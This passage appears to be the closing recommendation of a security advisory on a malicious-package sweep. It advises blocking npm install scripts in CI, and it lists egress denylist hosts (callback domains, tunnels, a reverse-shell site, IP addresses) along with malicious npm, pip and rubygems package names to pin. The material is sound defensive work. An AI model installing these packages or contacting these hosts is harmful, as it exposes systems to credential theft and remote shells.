  12. 12For every npm install in CI, prefer --ignore-scripts and enforce it at the runner level (note it does NOT block Clusters C or D - both fire at require/module-load, not on install script). Layer with egress denylists on oob.algamil7x.xyz, raw.githubusercontent.com/skyzopedia/*, npmjs.it.com, jsonspack.com, reverse-shell.sh, ai-script.test0ing7.workers.dev, dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun, eoy34oyrep9j5x8.m.pipedream.net, estimator-nemeses-unwatched.ngrok-free.dev, already-query-bacteria-agreed.trycloudflare.com, 5.189.173.113, 10.0.73.186, and 10.0.5.109. Extend the pin-lists from prior sweeps with @baanx/common, @baanx/domain, @insiderintelligence/componentlibrary, @rixxcodex/baileys, @rixxcodex/libsignal, sea-baileys, @otaxayun/libsignal-node, pino-testkit, vite-dev-launcher, @memtensor/memos-cloud-openclaw-plugin, internallib_v657, internallib_v463, godzz, godzzz, com.apple.unityplugin.storekit, simplenewnpmpackage, a-onesite, event-hunter, helpersutils-dev-tools, hachutis, and pip memoryos, rubygems wurl_show_data

References

multi-2026-09-24-ghsa-malware-sweep